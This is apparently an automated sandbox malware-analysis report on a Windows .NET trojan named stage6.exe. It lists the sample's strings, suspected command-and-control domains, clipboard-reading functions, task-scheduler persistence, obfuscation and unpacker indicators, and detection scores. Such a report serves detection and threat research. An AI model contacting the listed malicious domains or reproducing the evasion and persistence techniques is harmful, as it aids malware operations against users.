Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwA
Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz
Source: stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacebudi.lat/api
Source: stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379141192.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.4:49722 version: TLS 1.2

Source: C:\Users\user\Desktop\stage6.exe

Code function: 1_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004329C0

Source: C:\Users\user\Desktop\stage6.exe

Code function: 1_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_004329C0

Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_0670EA48	0_2_0670EA48
Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_0670DF90	0_2_0670DF90
Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_066F0040	0_2_066F0040
Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_066F0006	0_2_066F0006
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00408850	1_2_00408850
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0040ACF0	1_2_0040ACF0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00423860	1_2_00423860
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00438810	1_2_00438810
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041682D	1_2_0041682D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004288CB	1_2_004288CB
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D880	1_2_0043D880
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004218A0	1_2_004218A0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00430940	1_2_00430940
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00403970	1_2_00403970
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00420939	1_2_00420939
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004179C1	1_2_004179C1
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004231C2	1_2_004231C2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004241C0	1_2_004241C0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043B1D0	1_2_0043B1D0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004291DD	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D980	1_2_0043D980
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00405990	1_2_00405990
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00422190	1_2_00422190
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D997	1_2_0043D997
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D999	1_2_0043D999
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004091B0	1_2_004091B0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042CA49	1_2_0042CA49
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042DA53	1_2_0042DA53
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00416263	1_2_00416263
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0040EA10	1_2_0040EA10
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00415220	1_2_00415220
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042CAD0	1_2_0042CAD0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004252DD	1_2_004252DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041B2E0	1_2_0041B2E0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00406280	1_2_00406280
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043DA80	1_2_0043DA80
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041E290	1_2_0041E290
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041CB40	1_2_0041CB40
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D34D	1_2_0043D34D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00426B50	1_2_00426B50
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043DB60	1_2_0043DB60
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00436B08	1_2_00436B08
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042830D	1_2_0042830D
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042CB11	1_2_0042CB11
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00404320	1_2_00404320
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042CB22	1_2_0042CB22
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00425327	1_2_00425327
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00408330	1_2_00408330
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043F330	1_2_0043F330
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042A33F	1_2_0042A33F
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0040DBD9	1_2_0040DBD9
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00424380	1_2_00424380
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041FC75	1_2_0041FC75
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041DC00	1_2_0041DC00
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00429C2B	1_2_00429C2B
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004291DD	1_2_004291DD
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004074F0	1_2_004074F0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041148F	1_2_0041148F
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042AC90	1_2_0042AC90
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043ECA0	1_2_0043ECA0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0040CD46	1_2_0040CD46
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00437500	1_2_00437500
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00422510	1_2_00422510
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00417DEE	1_2_00417DEE
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00437DF0	1_2_00437DF0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00409580	1_2_00409580
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041759F	1_2_0041759F
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00425E70	1_2_00425E70
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00436E74	1_2_00436E74
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00427603	1_2_00427603
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00425E30	1_2_00425E30
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004286C0	1_2_004286C0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043AEC0	1_2_0043AEC0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004266D0	1_2_004266D0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004236E2	1_2_004236E2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00405EE0	1_2_00405EE0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041DE80	1_2_0041DE80
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00402F50	1_2_00402F50
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00420F50	1_2_00420F50
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00438F59	1_2_00438F59
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00406710	1_2_00406710
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00423F20	1_2_00423F20
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043F720	1_2_0043F720
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00419F30	1_2_00419F30
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0041E7C0	1_2_0041E7C0
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004197C2	1_2_004197C2
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0042DFE9	1_2_0042DFE9
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0040A780	1_2_0040A780
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00411F90	1_2_00411F90
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00418792	1_2_00418792
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00415799	1_2_00415799
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043EFB0	1_2_0043EFB0

Source: C:\Users\user\Desktop\stage6.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Users\user\Desktop\stage6.exe	Code function: String function: 00414400 appears 65 times

Source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs stage6.exe
Source: stage6.exe, 00000000.00000002.1157032298.00000000059F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameChrpggd.dll" vs stage6.exe
Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs stage6.exe
Source: stage6.exe, 00000000.00000000.1135979191.0000000001018000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename1.exe$ vs stage6.exe
Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs stage6.exe
Source: stage6.exe, 00000000.00000002.1144476584.00000000016CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs stage6.exe
Source: stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs stage6.exe
Source: stage6.exe	Binary or memory string: OriginalFilename1.exe$ vs stage6.exe

Source: stage6.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: stage6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: stage6.exe, ---.cs	Cryptographic APIs: 'CreateDecryptor'
Source: stage6.exe, ---.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@10/2

Source: C:\Users\user\Desktop\stage6.exe

Code function: 1_2_00430C70 CoCreateInstance,

1_2_00430C70

Source: C:\Users\user\Desktop\stage6.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\stage6.exe	Mutant created: \Sessions\1\BaseNamedObjects\Ruiexf

Source: stage6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: stage6.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\stage6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: stage6.exe	Virustotal: Detection: 59%
Source: stage6.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\stage6.exe

File read: C:\Users\user\Desktop\stage6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"
Source: C:\Users\user\Desktop\stage6.exe	Process created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"
Source: C:\Users\user\Desktop\stage6.exe	Process created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"	Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: stage6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: stage6.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: stage6.exe

Static file information: File size 1657856 > 1048576

Source: stage6.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x194200

Source: stage6.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: stage6.exe, ---.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.stage6.exe.5e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stage6.exe PID: 6272, type: MEMORYSTR

Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_016B0F71 push edx; iretd	0_2_016B0F7B
Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_066F58EC push ebx; retf	0_2_066F58F7
Source: C:\Users\user\Desktop\stage6.exe	Code function: 0_2_066F35E9 push ds; retf	0_2_066F35EC
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	1_2_0043D812
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_00443469 push ebp; iretd	1_2_0044346C
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0044366E push 9F00CD97h; ret	1_2_004436B1
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	1_2_0043AE3E
Source: C:\Users\user\Desktop\stage6.exe	Code function: 1_2_004477A5 push ebp; iretd	1_2_004477AA

Source: stage6.exe

Static PE information: section name: .text entropy: 7.498920761662283

Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
